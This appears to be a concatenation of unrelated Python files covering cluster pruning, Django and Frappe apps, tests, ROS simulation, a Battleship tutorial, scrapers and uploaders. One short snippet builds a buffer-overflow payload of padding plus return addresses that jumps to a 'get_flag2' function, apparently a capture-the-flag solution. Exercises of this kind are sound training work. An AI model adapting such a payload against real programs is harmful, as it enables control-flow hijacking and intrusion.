default='/tmp/admin.kubeconfig', help='Kubeconfig creds to use') self.args = parser.parse_args() def ensure_autopruner_exists(self): ''' create autopruning account/perms if it doesn't exist ''' # user exists? cmd = ['oc', 'get', 'serviceaccount', SERVICE_ACCOUNT, '-n', SERVICE_ACCOUNT_GROUP, '--config', self.args.kube_config] rc = subprocess.call(cmd) if rc != 0: # create service account if self.args.debug: print "Service account not found. Creating." read, write = os.pipe() sa_template = json.dumps(SERVICE_ACCOUNT_TEMPLATE) os.write(write, sa_template) os.close(write) cmd = ['oc', 'create', '-n', SERVICE_ACCOUNT_GROUP, '-f', '-', '--config', self.args.kube_config] try: subprocess.check_call(cmd, stdin=read) except subprocess.CalledProcessError: print "Error creating service account" raise # check if autoprune user has pruning perms username = "system:serviceaccount:{}:{}".format(SERVICE_ACCOUNT_GROUP, SERVICE_ACCOUNT) cmd = ['oc', 'get', 'clusterrolebindings', 'system:image-pruner', '-o', 'json', '--config', self.args.kube_config] rc = 0 try: output = json.loads(subprocess.check_output(cmd)) except subprocess.CalledProcessError as e: rc = e.returncode if rc != 0 or username not in output['userNames']: # grant image pruning if self.args.debug: print "Granding image pruning perms" cmd = ['oadm', 'policy', 'add-cluster-role-to-user', 'system:image-pruner', username, '--config', self.args.kube_config] try: subprocess.check_call(cmd) except subprocess.CalledProcessError: print "Error granting image pruning perms" raise def get_autopruner_token(self): ''' fetch and return the token for the autopruning account ''' token = None self.ensure_autopruner_exists() # get token cmd = ['oc', 'get', 'serviceaccounts', SERVICE_ACCOUNT, '-n', SERVICE_ACCOUNT_GROUP, '-o', 'json', '--config', self.args.kube_config] output = json.loads(subprocess.check_output(cmd)) secretname = None for secret in output['secrets']: if secret['name'].startswith(SERVICE_ACCOUNT + '-token'): secretname = secret['name'] if secretname == None: raise Exception("No secret with token info found.") cmd = ['oc', 'get', 'secrets', secretname, '-n', SERVICE_ACCOUNT_GROUP, '-o', 'json', '--config', self.args.kube_config] output = json.loads(subprocess.check_output(cmd)) token = base64.standard_b64decode(output['data']['token']) return token def prune_images(self): ''' call oadm to prune images ''' token = self.get_autopruner_token() cmd = ['oadm', 'prune', 'images', '--keep-younger-than', self.args.image_keep_younger_than, '--keep-tag-revisions', self.args.image_keep_tag_revisions, '--config', self.args.kube_config, '--token', token, '--confirm'] output = subprocess.check_output(cmd) if self.args.debug: print "Prune images output:\n" + output def prune_builds(self): ''' call oadm to prune builds ''' cmd = ['oadm', 'prune', 'builds', '--keep-complete', self.args.build_keep_complete, '--keep-younger-than', self.args.build_keep_younger_than, '--keep-failed', self.args.build_keep_failed, '--config', self.args.kube_config, '--confirm'] output = subprocess.check_output(cmd) if self.args.debug: print "Prune build output:\n" + output def prune_deployments(self): ''' call oadm to prune deployments ''' cmd = ['oadm', 'prune', 'deployments', '--keep-complete', self.args.deploy_keep_complete, '--keep-younger-than', self.args.deploy_keep_younger_than, '--keep-failed', self.args.deploy_keep_failed, '--config', self.args.kube_config, '--confirm'] output = subprocess.check_output(cmd) if self.args.debug: print "Prune deployment output:\n" + output def main(self): ''' Prune images/builds/deployments ''' rc = 0 try: self.prune_deployments() except subprocess.CalledProcessError as e: print "Error pruning deployments" rc = e.returncode try: self.prune_builds() except subprocess.CalledProcessError as e: print "Error pruning builds" rc = e.returncode try: self.prune_images() except subprocess.CalledProcessError as e: print "Error pruning images" rc = e.returncode if rc != 0: raise Exception("Error during pruning") if __name__ == '__main__': OSPruner = OpenShiftPrune() OSPruner.main()
python
from django.apps import AppConfig class BlastNew(AppConfig): name = 'blast_new'
python
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt # For license information, please see license.txt from __future__ import unicode_literals import frappe import frappe.utils import os from frappe import _ from frappe.website.doctype.website_route.website_route import add_to_sitemap, update_sitemap, cleanup_sitemap from frappe.utils.nestedset import rebuild_tree from frappe.model.document import Document class WebsiteTemplate(Document): def after_insert(self): if self.page_or_generator == "Page": website_route = frappe.db.get_value("Website Route", {"website_template": self.name, "page_or_generator": "Page"}) opts = self.as_dict() opts.update({"public_read": 1}) if website_route: update_sitemap(website_route, opts) else: add_to_sitemap(opts) else: condition = "" if self.condition_field: condition = " where ifnull(%s, 0)=1" % self.condition_field for name in frappe.db.sql_list("""select name from `tab{doctype}` {condition} order by idx asc, {sort_field} {sort_order}""".format( doctype = self.ref_doctype, condition = condition, sort_field = getattr(self, "sort_field", "name"), sort_order = getattr(self, "sort_order", "asc") )): doc = frappe.get_doc(self.ref_doctype, name) # regenerate route doc.run_method("on_update") def rebuild_website_template(): # TODO frappe.flags.in_rebuild_config = True frappe.db.sql("""delete from `tabWebsite Template`""") for app in frappe.get_installed_apps(): if app=="webnotes": app="frappe" build_website_template(app) cleanup_sitemap() frappe.flags.in_rebuild_config = False # enable nested set and rebuild rebuild_tree("Website Route", "parent_website_route") frappe.db.commit() def build_website_template(app): config = {"pages": {}, "generators":{}} pages, generators = get_pages_and_generators(app) for args in pages: add_website_template(**args) for args in generators: add_website_template(**args) frappe.db.commit() def get_pages_and_generators(app): pages = [] generators = [] app_path = frappe.get_app_path(app) for config_type in ("pages", "generators"): path = os.path.join(app_path, "templates", config_type) if os.path.exists(path): for fname in os.listdir(path): fname = frappe.utils.cstr(fname) if fname.split(".")[-1] in ("html", "xml", "js", "css"): if config_type=="pages": pages.append({"page_or_generator": "Page", "app": app, "path": path, "fname":fname, "app_path":app_path}) else: generators.append({"page_or_generator": "Generator", "app": app, "path": path, "fname":fname, "app_path":app_path}) return pages, generators def add_website_template(page_or_generator, app, path, fname, app_path): name = fname[:-5] if fname.endswith(".html") else fname wsc = frappe._dict({ "doctype": "Website Template", "page_or_generator": page_or_generator, "link_name": name, "template_path": os.path.relpath(os.path.join(path, fname), app_path), }) wsc.controller = get_template_controller(app, path, fname) if wsc.controller: # verbose print wsc.controller module = frappe.get_module(wsc.controller) wsc.no_cache = getattr(module, "no_cache", 0) wsc.no_sitemap = wsc.no_cache or getattr(module, "no_sitemap", 0) wsc.no_sidebar = wsc.no_sidebar or getattr(module, "no_sidebar", 0) wsc.ref_doctype = getattr(module, "doctype", None) wsc.page_name_field = getattr(module, "page_name_field", "page_name") wsc.condition_field = getattr(module, "condition_field", None) wsc.sort_by = getattr(module, "sort_by", "name") wsc.sort_order = getattr(module, "sort_order", "asc") wsc.base_template_path = getattr(module, "base_template_path", None) wsc.page_title = getattr(module, "page_title", _(name.title())) if frappe.db.exists("Website Template", wsc.link_name): # found by earlier app, override frappe.db.sql("""delete from `tabWebsite Template` where name=%s""", (wsc.link_name,)) frappe.get_doc(wsc).insert() return name def get_template_controller(app, path, fname): controller = None controller_name = fname.split(".")[0].replace("-", "_") + ".py" controller_path = os.path.join(path, controller_name) if os.path.exists(controller_path): controller = app + "." + os.path.relpath(controller_path[:-3], frappe.get_app_path(app)).replace(os.path.sep, ".") return controller
python
size(960, 240) background(0) fill(205) ellipse(264, 164, 400, 400) fill(150) ellipse(456, -32, 400, 400) fill(49) ellipse(532, 236, 400, 400)
python
from os import symlink from os.path import join, realpath from functools import wraps from textwrap import dedent from pprint import PrettyPrinter from operator import itemgetter from mock import Mock from git import Repo from jig.tests.testcase import JigTestCase from jig.diffconvert import describe_diff, DiffType, GitDiffIndex from jig.tools import cwd_bounce def assertDiff(func): """ Decorator used to test diffs. Uses ``yield`` in the following way: @assertDiff def test_my_diff(self): yield 'one' yield 'two' yield [(1, '-', 'one'), (1, '+', 'two')] The order of the yields are: 1. Original value (a) 2. After it's edited (b) 3. The expected difference """ pp = PrettyPrinter().pformat @wraps(func) def wrapper(self, **kwargs): queue = func(self, **kwargs) a = next(queue) b = next(queue) expected = next(queue) a = dedent(a).strip() b = dedent(b).strip() actual = [i for i in describe_diff(a, b)] if not expected == actual: # pragma: no cover self.fail('Diff does not match:\nexpected\n{}\nactual\n{}'.format( pp(expected), pp(actual))) return wrapper class TestDescribeDiff(JigTestCase): """ Test our diff description method. """ @assertDiff def test_all_addition(self): """ All lines are being added. """ yield '' yield ''' one two three''' yield [ (1, '+', 'one'), (2, '+', 'two'), (3, '+', 'three')] @assertDiff def test_add_blank_lines(self): """ Lines added are just blank lines. """ yield ''' one two three''' yield ''' one two three''' # This is a bit counter-intuitive, but correct yield [ (1, ' ', 'one'), (2, '+', ''), (3, '+', ''), (4, ' ', 'two'), (5, ' ', 'three')] @assertDiff def test_all_same(self): """ No changes. """ yield ''' one two three''' yield ''' one two three''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, ' ', 'three')] @assertDiff def test_one_insert(self): """ Just one line inserted. """ yield ''' one two three''' yield ''' one two 2.5 three''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '+', '2.5'), (4, ' ', 'three')] @assertDiff def test_one_delete(self): """ Just one deleted. """ yield ''' one two three four''' yield ''' one two four''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '-', 'three'), (3, ' ', 'four')] @assertDiff def test_one_insert_delete(self): """ One insert, one delete. """ yield ''' one two three four''' yield ''' one two 3 four''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '-', 'three'), (3, '+', '3'), (4, ' ', 'four')] @assertDiff def test_one_character_change(self): """ A single character changed. """ yield ''' one two three four''' yield ''' one two thr3e four''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '-', 'three'), (3, '+', 'thr3e'), (4, ' ', 'four')] @assertDiff def test_complex_01(self): """ Complex example with several changes. """ yield ''' one two three three-and-a-smidge four''' yield ''' one 1.5 two three four''' yield [ (1, ' ', 'one'), (2, '+', '1.5'), (3, ' ', 'two'), (4, ' ', 'three'), (4, '-', 'three-and-a-smidge'), (5, '+', ''), (6, ' ', 'four')] class TestDiffType(JigTestCase): """ Detect diff type from :py:class:`Git.Diff` objects. """ def test_add(self): """ Add type. """ diff = Mock() diff.new_file = True self.assertEqual(DiffType.A, DiffType.for_diff(diff)) def test_deleted(self): """ Deleted type. """ diff = Mock() diff.new_file = False diff.deleted_file = True self.assertEqual(DiffType.D, DiffType.for_diff(diff)) def test_renamed(self): """ Renamed type. """ diff = Mock() diff.new_file = False diff.deleted_file = False diff.renamed = True self.assertEqual(DiffType.R, DiffType.for_diff(diff)) def test_modified(self): """ Modified type. """ diff = Mock() diff.new_file = False diff.deleted_file = False diff.renamed = False diff.a_blob = 'blob a' diff.b_blob = 'blob b' self.assertEqual(DiffType.M, DiffType.for_diff(diff)) def test_unknown(self): """ Unknown type. """ diff = Mock() diff.new_file = False diff.deleted_file = False diff.renamed = False diff.a_blob = False diff.b_blob = False self.assertEqual(DiffType.U, DiffType.for_diff(diff)) class TestGitDiffIndex(JigTestCase): """ Test converting Git changes to JSON. """ def setUp(self): super(TestGitDiffIndex, self).setUp() repo, working_dir, diffs = self.repo_from_fixture('repo01') self.testrepo = repo self.testrepodir = working_dir self.testdiffs = diffs def test_new_file(self): """ Handles new files. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[0]) self.assertEqual(1, len(list(gdi.files()))) file1 = next(gdi.files()) # This one is relative to the Git repo self.assertEqual('argument.txt', file1['name']) # It should be added because this is a new file self.assertEqual('added', file1['type']) # This one is the full path to the file self.assertEqual( realpath(join(self.testrepodir, 'argument.txt')), realpath(file1['filename'])) def test_modified(self): """ Handles modified files. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[1]) self.assertEqual(1, len(list(gdi.files()))) file1 = next(gdi.files()) diff = [i for i in file1['diff']] difftypes = set([i[1] for i in diff]) # File was changed self.assertEqual('modified', file1['type']) # We should have every kind of modification # Same lines, additions, and subtractions self.assertEqual( set([' ', '+', '-']), difftypes) # And we have a list of differences as expected self.assertEqual(47, len(diff)) def test_deleted_file(self): """ Handles deleted files. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[2]) self.assertEqual(1, len(list(gdi.files()))) file1 = next(gdi.files()) diff = [i for i in file1['diff']] difftypes = set([i[1] for i in diff]) # File was deleted self.assertEqual('deleted', file1['type']) # Each line should be a removal self.assertEqual( set(['-']), difftypes) self.assertEqual(35, len(diff)) def test_multiple_changes(self): """ Handles multiple files changed. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[3]) self.assertEqual(2, len(list(gdi.files()))) files = sorted( [i for i in gdi.files()], key=itemgetter('name')) self.assertEqual( 'famous-deaths.txt', files[0]['name']) self.assertEqual( 'italian-lesson.txt', files[1]['name']) def test_name_contains_subdirectories(self): """ If sub-directories are involved, those are included properly. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[4]) # Since we've moved the file Git will see this as a deletion of 2 files # plus the addition of 2 files, so it makes our count 4. self.assertEqual(4, len(list(gdi.files()))) files = sorted( [i for i in gdi.files()], key=itemgetter('name')) # Make sure that the name contains our sub-directory. self.assertEqual( 'scripts/famous-deaths.txt', files[2]['name']) self.assertEqual( 'scripts/italian-lesson.txt', files[3]['name']) def test_binary_diff(self): """ Binary files are ignored. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[5]) # We should see our file self.assertEqual(1, len(list(gdi.files()))) # But we don't include the diff since it's binary data self.assertEqual([], gdi.files().next()['diff']) def test_ignores_jig_directory(self): """ Does not include anything in the .jig directory. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[6]) # We should see our file self.assertEqual(0, len(list(gdi.files()))) def test_symlinks(self): """ Symlinks are ignored because they are not real files. """ self.commit(self.gitrepodir, 'text/a.txt', 'a') self.commit(self.gitrepodir, 'text/b.txt', 'b') self.commit(self.gitrepodir, 'text/c.txt', 'c') # Create the symlink that should be ignored by GitDiffIndex with cwd_bounce(self.gitrepodir): symlink('text', 'also_text') # We have to do this without our testcase since it's a special # situation. repo = Repo(self.gitrepodir) repo.git.add('also_text') # The symlink is staged, time to convert the diff gdi = GitDiffIndex(self.gitrepodir, repo.head.commit.diff()) # If we ignored the symlink, which we should, there should be no files self.assertEqual(0, len(list(gdi.files())))
python
import rospy import subprocess from gazebo_msgs.srv import DeleteModel from gazebo_msgs.srv import SetModelConfiguration from gazebo_msgs.srv import SpawnModel from std_srvs.srv import Empty as EmptySrv from std_srvs.srv import EmptyResponse as EmptySrvResponse class Experiment(object): ''' Spawn objects Clean objects ''' # This defines the default robot for simulating a UR5 in a particular # environment model_name = "robot" joint_names = ["shoulder_pan_joint", "shoulder_lift_joint", "elbow_joint", "wrist_1_joint", "wrist_2_joint", "wrist_3_joint"] joint_positions = [0.30, -1.33, -1.80, -0.27, 1.50, 1.60] def __init__(self, *args, **kwargs): pass def reset(self): raise NotImplementedError('Experiment not defined') def GetExperiment(experiment, *args, **kwargs): return { "magnetic_assembly": MagneticAssemblyExperiment, "stack": StackExperiment, "navigation" : NavigationExperiment }[experiment](*args, **kwargs) class MagneticAssemblyExperiment(Experiment): ''' Magnetic assembly sim launches different blocks ''' def __init__(self, case): self.case = case self.experiment_file = "magnetic_assembly.launch" def reset(self): rospy.wait_for_service("gazebo/set_model_configuration") configure = rospy.ServiceProxy("gazebo/set_model_configuration", SetModelConfiguration) configure(model_name=self.model_name, joint_names=self.joint_names, joint_positions=self.joint_positions) rospy.wait_for_service("gazebo/delete_model") delete_model = rospy.ServiceProxy("gazebo/delete_model", DeleteModel) delete_model("gbeam_soup") res = subprocess.call([ "roslaunch", "costar_simulation", self.experiment_file, "experiment:=%s"%self.case]) res = subprocess.call(["rosservice","call","publish_planning_scene"]) class StackExperiment(Experiment): ''' Create a stack of blocks more or less at random Also probably reset the robot's joint states ''' def reset(self): rospy.wait_for_service("gazebo/set_model_configuration") configure = rospy.ServiceProxy("gazebo/set_model_configuration", SetModelConfiguration) configure(model_name=self.model_name, joint_names=self.joint_names, joint_positions=self.joint_positions) # select random block positions for each block pass class NavigationExperiment(Experiment): ''' Initialize a navigation experiment ''' def reset(self): #TODO pass
python
"""Define library examples."""
python
import os class RootDir: HOME_DIR = os.path.expanduser('~') DIR_NAME = '.stoobly' _instance = None def __init__(self): if RootDir._instance: raise RuntimeError('Call instance() instead') else: self.root_dir = os.path.join(self.HOME_DIR, self.DIR_NAME) if not os.path.exists(self.root_dir): os.mkdir(self.root_dir) @classmethod def instance(cls): if cls._instance is None: cls._instance = cls() return cls._instance @property def tmp_dir(self): return os.path.join(self.root_dir, 'tmp')
python
from django.contrib import admin from .models import * # Register your models here. class ShortAdmin(admin.ModelAdmin): list_display = ['website', 'slug', 'expired', 'creation_date', 'expiration'] actions = ['expire','unexpire'] def expire(self, request, queryset): for link in queryset: link.expired = True link.save() expire.short_description = 'Expire all links' def unexpire(self, request, queryset): for link in queryset: link.expired = False link.save() unexpire.short_description = 'Unexpire all links' admin.site.register(ShortURL, ShortAdmin)
python
# Contents: # Getting Our Feet Wet # Make a List # Check it Twice # Custom Print # Printing Pretty # Hide... # ...and Seek! # You win! # Danger, Will Robinson!!! # Bad Aim # Not Again! # Play It, Sam # Game Over # A Real Win print("### Getting Our Feet Wet ###") board = [] print("### Make a List ###") for i in range(5): board.append(['O'] * 5) print("### Check it Twice ###") # for i in board: # print(i) print("### Custom Print ###") # def print_board(board_in): # for row in board_in: # print(row) # # print_board(board) print("### Printing Pretty ###") def print_board(board_in): for row in board_in: print(" ".join(row)) print_board(board) print("### Hide... ###") from random import randint def random_row(board): return randint(0, len(board) - 1) def random_col(board): return randint(0, len(board) - 1) ship_row = random_row(board) ship_col = random_col(board) print(ship_row) print(ship_col) print("### ...and Seek! ###") # guess_row = int(input("Guess Row: ")) # guess_col = int(input("Guess Col: ")) print("### You win! ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") print("### Danger, Will Robinson!!! ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Bad Aim ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Not Again! ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # elif (board[guess_row][guess_col] == 'X'): # print("You guessed that one already.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Play It, Sam ###") # for turn in range(4): # print("Turn", turn + 1) # guess_row = int(input("Guess Row: ")) # guess_col = int(input("Guess Col: ")) # # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # elif board[guess_row][guess_col] == "X": # print("You guessed that one already.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Game Over ###") # for turn in range(4): # print("Turn", turn + 1) # guess_row = int(input("Guess Row: ")) # guess_col = int(input("Guess Col: ")) # # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # elif board[guess_row][guess_col] == "X": # print("You guessed that one already.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # if (turn == 3): # print("Game Over") # print_board(board) print("### A Real Win ###") for turn in range(4): print("Turn", turn + 1) guess_row = int(input("Guess Row: ")) guess_col = int(input("Guess Col: ")) if guess_row == ship_row and guess_col == ship_col: print("Congratulations! You sank my battleship!") break else: if guess_row not in range(5) or \ guess_col not in range(5): print("Oops, that's not even in the ocean.") elif board[guess_row][guess_col] == "X": print("You guessed that one already.") else: print("You missed my battleship!") board[guess_row][guess_col] = "X" if (turn == 3): print("Game Over") print_board(board)
python
import redis r = redis.Redis() def main(): print(r.info()) if __name__ == '__main__': main()
python
from selenium import webdriver import multiprocessing as mp import numpy as np import parms from webdriver_manager.firefox import GeckoDriverManager from selenium.webdriver.firefox.options import Options # Prepare driver options = Options() options.headless = True driver = webdriver.Firefox(options=options ,executable_path=GeckoDriverManager().install()) args = parms.args domains = np.array(open(args.filename).read().splitlines()) domains = np.array_split(domains, 6) def take_shot(a): for y in domains[int(a)]: try: print("[+] Trying to screenshot: ",y) driver.get(formaturl(y)) rem = ["https://", "http://"] path = f"{args.output}/{y}.png" for strToReplace in rem: path = path.replace(strToReplace, "") driver.save_screenshot(path) except: print("[--]Failed to screen shot: ",y) else: print("Success ",y) driver.quit() def start_task(): t1 = mp.Process(target=take_shot, args=(str(0))) t2 = mp.Process(target=take_shot, args=(str(1))) t3 = mp.Process(target=take_shot, args=(str(2))) t4 = mp.Process(target=take_shot, args=(str(3))) t5 = mp.Process(target=take_shot, args=(str(4))) t6 = mp.Process(target=take_shot, args=(str(5))) t1.start() t2.start() t3.start() t4.start() t5.start() t6.start() t1.join() t2.join() t3.join() t4.join() t5.join() t6.join() print("[++] Finished") driver.quit() def formaturl(url): if("https://" not in url): if("http://" not in url): return "http://" + url else: return url else: return url if __name__ == '__main__': start_task()
python
# -*- coding: UTF-8 -*- import unittest import os.path from typing import List from wpydumps import parser from wpydumps.model import Page SAMPLE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "sample.xml") class TestParser(unittest.TestCase): def test_parse(self): pages: List[Page] = [] def callback(page): pages.append(page) with open(SAMPLE_PATH) as f: parser.parse_pages_from_reader(f, callback, keep_revisions_text=True) self.assertEqual(2, len(pages)) page1: Page = pages[0] page2: Page = pages[1] self.assertEqual("Utilisateur:Allinde/Mise en forme", page1.title) self.assertEqual(4, len(page1.revisions)) self.assertEqual("ANGOA", page2.title) self.assertEqual("Association des producteurs de cinéma", page2.redirect)
python
import mimetypes import time from django.http import HttpResponse, Http404, HttpResponseNotModified from django.utils.http import http_date from django.views.static import was_modified_since from django.conf import settings from simplethumb.models import Image from simplethumb.spec import Spec, ChecksumException, decode_spec # noinspection PyUnusedLocal def serve_image(request, basename, encoded_spec, ext): try: image = Image(url=basename) except OSError: raise Http404() try: spec = Spec.from_spec( decode_spec(encoded_spec, image.basename, image.mtime, settings.SIMPLETHUMB_HMAC_KEY ) ) except ChecksumException: raise Http404() image.spec = spec mimetype = mimetypes.guess_type(request.path)[0] if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'), image.mtime, image.stat.st_size): return HttpResponseNotModified(content_type=mimetype) expire_time = settings.SIMPLETHUMB_EXPIRE_HEADER resp = HttpResponse( image.render(), mimetype ) resp['Expires'] = http_date(time.time() + expire_time) resp['Last-Modified'] = http_date(image.mtime) return resp
python
#!/usr/bin/python import csv import random import numpy as np import pandas as pd inFile19 = "csvOdds/gameIDodds2019.csv" iTrainFile19 = open(inFile19, "r") readerTrain19 = csv.reader(iTrainFile19, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) inFile18 = "csvOdds/gameIDodds2018.csv" iTrainFile18 = open(inFile18, "r") readerTrain18 = csv.reader(iTrainFile18, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) inFile17 = "csvOdds/gameIDodds2017.csv" iTrainFile17 = open(inFile17, "r") readerTrain17 = csv.reader(iTrainFile17, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) inFile16 = "csvOdds/gameIDodds2016.csv" iTrainFile16 = open(inFile16, "r") readerTrain16 = csv.reader(iTrainFile16, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) inFile15 = "csvOdds/gameIDodds2015.csv" iTrainFile15 = open(inFile15, "r") readerTrain15 = csv.reader(iTrainFile15, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) inFileTrain = "testtrainData.csv" # inFileTrain = "fixedDataDupExamples.csv" iTrainFile = open(inFileTrain, "r") readerTrain = csv.reader(iTrainFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) outTrainFile = "fixedWL_trainData.csv" oTrainFile = open(outTrainFile, "w") writerTrain = csv.writer(oTrainFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL) allScores= {} for row in readerTrain19: allScores[row[0]+row[1]] = int(row[-4]) for row in readerTrain18: allScores[row[0]+row[1]] = int(row[-4]) for row in readerTrain17: allScores[row[0]+row[1]] = int(row[-4]) for row in readerTrain16: allScores[row[0]+row[1]] = int(row[-4]) for row in readerTrain15: allScores[row[0]+row[1]] = int(row[-4]) for row in readerTrain: currentRow = [row[0]] team1Score = 0 team2Score = 0 team1Home = 0 team2Home = 0 try: if row[0] == '': continue HScore = int(allScores["00"+row[0]+'H']) VScore = int(allScores["00"+row[0]+'V']) # print(str(row[0])) if int(row[2]) == HScore: ###if team1 is home # print("team1 is home") if int(row[3]) == VScore: # print("team2 is visitor") team1Score = HScore team2Score = VScore team1Home = 1 elif int(row[2]) == VScore: #### if team1 is visitor # print("team1 is visitor") if int(row[3]) == HScore: # print("team2 is home") team1Score = VScore team2Score = HScore team2Home = 1 else: print("possible game mismatch. score did not match either team") if team1Score > team2Score: currentRow.append(1) else: currentRow.append(0) currentRow.append(team1Score) currentRow.append(team2Score) currentRow.append(team1Home) for i in range(5,707): currentRow.append(row[i]) currentRow.append(team2Home) for i in range(708,len(row)): currentRow.append(row[i]) writerTrain.writerow(currentRow) except: try: # print("no clear Home/Visitor - " + row[0]) team1Home = 0.5 team2Home = 0.5 team1Score = int(row[2]) team2Score = int(row[3]) if team1Score > team2Score: currentRow.append(1) else: currentRow.append(0) currentRow.append(team1Score) currentRow.append(team2Score) currentRow.append(team1Home) for i in range(5,707): currentRow.append(row[i]) currentRow.append(team2Home) for i in range(708,len(row)): currentRow.append(row[i]) writerTrain.writerow(currentRow) except: print("this game is just weird")
python
import struct import telnetlib def p(x): return struct.pack('<L', x) get_flag2 = 0x804892b setup_get_flag2 = 0x8048921 # Flag 2 payload = "" payload += "P"*112 # Add the padding leading to the overflow payload += p(setup_get_flag2) payload += p(get_flag2) print(payload)
python
# coding: utf-8 import sys from codecs import open from urllib2 import urlopen from simplejson import loads as load_json url = urlopen("http://www.example.com/wp-admin/admin-ajax.php?action=externalUpdateCheck&secret=ABCDEFABCDEFABCDEFABCDEFABCDEFAB") res = url.read() if res == "0": sys.exit(0) updates_input = load_json(res) updates_output = open("updates.htm", "w", "utf-8") updates_output.write("<h1>Available updates:</h1>\n") for area in sorted(updates_input.keys()): updates_output.write("<h2>%s</h2>\n" % (area.capitalize(), )) if area == "core": for update in updates_input[area]: updates_output.write("<p>New version: <strong>%s</strong></p>\n" % (update["current"], )) updates_output.write('<p><a href="%s">Download</a></p>\n' % (update["download"], )) else: for update in updates_input[area].values(): if update.has_key("Name"): updates_output.write("<h3>%s</h3>\n" % (update["Name"], )) if update.has_key("Version"): updates_output.write("<p>Current version: <strong>%s</strong></p>\n" % (update["Version"], )) if update.has_key("update") and update["update"].has_key("new_version"): updates_output.write("<p>New version: <strong>%s</strong></p>\n" % (update["update"]["new_version"], )) if update.has_key("update") and update["update"].has_key("package"): updates_output.write('<p><a href="%s">Download</a></p>\n' % (update["update"]["package"], )) updates_output.flush() updates_output.close() sys.exit(1)
python
# Services plugin for bb exporter # 2020 - Benoît Leveugle <[email protected]> # https://github.com/oxedions/bluebanquise - MIT license from pystemd.systemd1 import Unit from prometheus_client.core import GaugeMetricFamily class Collector(object): services = {} services_status = [] def __init__(self, parameters): self.services = parameters print('Services collector. Loading services status:') for idx, service in enumerate(self.services): print(' - Loading '+service) self.services_status.append(Unit(service, _autoload=True)) print(self.services_status) def collect(self): gauge_services = GaugeMetricFamily('system_services_state', 'System services status', labels=['service']) for idx, service in enumerate(self.services): result = self.services_status[idx].Unit.SubState if 'running' in str(result): print('Services collector. Service '+service+' is running.') gauge_services.add_metric([service], 1.0) else: print('Services collector. Service '+service+' is stopped.') gauge_services.add_metric([service], 0.0) yield gauge_services
python
import setuptools import os import sys # Get Version sys.path.append(os.path.dirname(__file__)) import versioneer __VERSION__ = versioneer.get_version() with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( version=__VERSION__, cmdclass=versioneer.get_cmdclass(), name="puckdns", author="Snake-Whisper", author_email="[email protected]", description="Python API for the great free DNS Service \"PUCK\" from Daniel J. Luke (http://puck.nether.net/dns)", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/Snake-Whisper/puckdns", package_dir={"": "src"}, packages=setuptools.find_packages(where="src"), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], setup_requires=['pytest-runner'], tests_require=['pytest'], python_requires='>=3.6', command_options={ 'build_sphinx': { 'version': ('setup.py', __VERSION__), 'release': ('setup.py', __VERSION__), 'source_dir': ('setup.py', 'docs')}}, )
python
# adds the results to s3 import boto3 import os import io import scraperwiki import time import simplejson as json import gzip import pandas as pd def upload(test): AWS_KEY = os.environ['AWS_KEY_ID'] AWS_SECRET = os.environ['AWS_SECRET_KEY'] queryString = "* from aus_ads" queryResult = scraperwiki.sqlite.select(queryString) pd.DataFrame(queryResult).to_csv('aus-google-ad-data.csv.gz',compression='gzip', index=False) results = json.dumps(queryResult, indent=4) with open('aus-google-ad-data.json','w') as fileOut: fileOut.write(results) if not test: print("Uploading JSON to S3") bucket = 'gdn-cdn' session = boto3.Session( aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET, ) s3 = session.resource('s3') key = "2021/11/google-ad-data/aus-google-ad-data.json" object = s3.Object(bucket, key) object.put(Body=results, CacheControl="max-age=300", ACL='public-read') print("Done") print("Uploading CSV to S3") key2 = "2021/11/google-ad-data/aus-google-ad-data.csv.gz" s3.meta.client.upload_file('aus-google-ad-data.csv.gz', bucket, key2, ExtraArgs={"CacheControl":"max-age=300", 'ACL':'public-read'}) print("Done") upload(False)
python
